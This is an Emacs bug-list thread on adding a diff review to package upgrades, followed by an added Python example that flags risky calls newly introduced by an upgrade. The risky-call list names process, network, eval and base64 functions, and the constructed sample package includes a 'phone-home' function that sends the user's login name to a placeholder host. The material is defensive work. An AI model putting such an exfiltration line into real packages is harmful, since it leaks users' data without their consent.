From: Ship Mints <shipmints@gmail.com>
Newsgroups: gmane.emacs.bugs
Subject: bug#74604: 30.0.92; FR: M-x package-upgrade - offer an option to show a diff on upgrade
Date: Mon, 2 Dec 2024 07:04:24 -0500
To: Philip Kaludercic <philipk@posteo.net>
Cc: Daniel Mendler <mail@daniel-mendler.de>, 74604@debbugs.gnu.org
In-Reply-To: <87r06qqx3z.fsf@posteo.net>
References: <87h67quk0g.fsf@daniel-mendler.de> <87zflfqct7.fsf@posteo.net> <87r06qqx3z.fsf@posteo.net>
Xref: news.gmane.io gmane.emacs.bugs:296311

Isn't it the case that describe-package works only on installed packages, not prospectively installed packages? To help determine the value/risk of a package install or update, I'd think it better to show this in advance. Daniel's diff suggestion is similar but more technical.

On Mon, Dec 2, 2024 at 3:59 AM Philip Kaludercic <philipk@posteo.net> wrote:

> Ship Mints <shipmints@gmail.com> writes:
>
> > I like this idea, too. I spend a reasonable amount of time trying to
> > understand what people have changed and if it will affect me negatively
> > (the defensive part) or positively (for new features, user options,
> > deprecations). Showing a source-code diff may be a bit technical for some
> > users, though. I wonder if there could be either a link to a changelog, or
> > a way to encourage a changelog convention so one could be displayed for
> > users prior to a decision to update a package.
>
> Note that packages can distribute this information. Currently, if a
> tarball includes a "news" file, it will be displayed by
> `describe-package'. IIRC no package archive generates these right now.
> But if we implement a user option like that described above (or below?),
> then we can add that as an option as well.
>
> The main issue is that not all package maintainers ensure that there are
> changelog/news sources that ELPA could use to provide this information.
>
> > -Stephane
> >
> > On Sun, Dec 1, 2024 at 5:06 PM Philip Kaludercic <philipk@posteo.net> wrote:
> >
> >> Daniel Mendler <mail@daniel-mendler.de> writes:
> >>
> >> > This is a feature request for the security wishlist. When upgrading a
> >> > package it would be good to show a diff between the new and old package
> >> > files. Such an option could help with performing review casually as part of
> >> > the upgrade process and may improve the security of the package
> >> > archives. More eyes would look at new package versions. This would make
> >> > it harder to inject malicious code either via the source repository or
> >> > via attacks on the package archives.
> >>
> >> That sounds like a good option to have! I'll look into adding something
> >> like this via a user option that adjusts how to confirm a package upgrade.
> >>
> >> Note that package-vc has something similar with the
> >> `package-vc-log-incoming' command.
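The "casual review as part of the upgrade" that Daniel asks for, as an added example that is not code from Emacs, package.el or anyone in this thread. Given the files of the installed package version and of the candidate new version, it produces the unified diff a user would be shown and, on top of that, flags added or changed lines that newly introduce process spawning, network access, eval/load or base64 calls, plus files that did not exist before. The two package versions, the file names and the list of flagged Elisp functions are constructed assumptions for the demo, not anything package.el checks.

```python
"""Added example for bug#74604: diff an installed package version against a
candidate upgrade and flag the changes a reviewer would want to look at.
Not Emacs code; package contents and the risky-call list are constructed."""

import difflib
import re

# Elisp calls whose sudden appearance in an upgrade deserves review. This
# list is an assumption for the example, not anything package.el checks.
RISKY_CALLS = {
    "process": ("call-process", "start-process", "make-process",
                "shell-command", "shell-command-to-string"),
    "network": ("url-retrieve", "url-retrieve-synchronously",
                "open-network-stream"),
    "eval": ("eval", "load", "load-file", "read-from-string"),
    "obfuscation": ("base64-decode-string", "base64-encode-string"),
}
# Match "(name" followed by a non-symbol character, so "(eval" does not
# match "(eval-when-compile".
RISKY_PATTERNS = {
    cat: re.compile(r"\((?:" + "|".join(map(re.escape, n)) + r")(?![-\w])")
    for cat, n in RISKY_CALLS.items()
}


def unified_diff(old_files, new_files):
    """Unified diff over the union of both file sets, as one string."""
    out = []
    for name in sorted(set(old_files) | set(new_files)):
        old = old_files.get(name, "").splitlines(keepends=True)
        new = new_files.get(name, "").splitlines(keepends=True)
        out.extend(difflib.unified_diff(old, new, fromfile="old/" + name,
                                        tofile="new/" + name))
    return "".join(out)


def review_upgrade(old_files, new_files):
    """Return (diff_text, findings); findings are (file, line, category, text).

    Only files absent from the old version and lines the upgrade adds or
    changes are flagged, so an existing call-process in the installed
    version does not produce noise on every upgrade."""
    findings = []
    for name in sorted(set(old_files) | set(new_files)):
        if name not in old_files:
            findings.append((name, 0, "new-file", "not in installed version"))
        old = old_files.get(name, "").splitlines()
        new = new_files.get(name, "").splitlines()
        matcher = difflib.SequenceMatcher(a=old, b=new, autojunk=False)
        for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
            if tag not in ("insert", "replace"):
                continue
            for idx in range(j1, j2):
                for cat, pattern in RISKY_PATTERNS.items():
                    if pattern.search(new[idx]):
                        findings.append((name, idx + 1, cat, new[idx].strip()))
    return unified_diff(old_files, new_files), findings


# Constructed sample: the installed version ...
OLD_PACKAGE = {
    "demo-pkg.el": (
        ";;; demo-pkg.el --- Constructed sample package\n"
        ";; Version: 1.0\n"
        "\n"
        "(defun demo-pkg-greet (name)\n"
        "  \"Greet NAME.\"\n"
        "  (message \"Hello, %s\" name))\n"
        "\n"
        "(provide 'demo-pkg)\n"
    ),
}
# ... and the candidate upgrade: a version bump, a harmless wording change,
# one new function that phones home (constructed), and one new file.
NEW_PACKAGE = {
    "demo-pkg.el": (
        ";;; demo-pkg.el --- Constructed sample package\n"
        ";; Version: 1.1\n"
        "\n"
        "(defun demo-pkg-greet (name)\n"
        "  \"Greet NAME politely.\"\n"
        "  (message \"Hello, %s!\" name))\n"
        "\n"
        "(defun demo-pkg--phone-home ()\n"
        "  \"Constructed example of a change a diff review should catch.\"\n"
        "  (url-retrieve-synchronously (concat \"https://example.invalid/?u=\""
        " (user-login-name))))\n"
        "\n"
        "(provide 'demo-pkg)\n"
    ),
    "demo-pkg-extra.el": ";;; Constructed new file\n(provide 'demo-pkg-extra)\n",
}

if __name__ == "__main__":
    diff, findings = review_upgrade(OLD_PACKAGE, NEW_PACKAGE)
    print(diff)
    for name, line, cat, text in findings:
        print(f"REVIEW {cat}: {name}:{line}: {text}")
```

The diff is what the user option discussed in the thread would surface; the findings list is the extra nudge for readers for whom a raw source diff is "a bit technical": a version bump and a docstring tweak produce no finding, while the new network call and the new file do. Byte-compiled or generated files in an archive tarball would need separate handling, since a text diff says little about them.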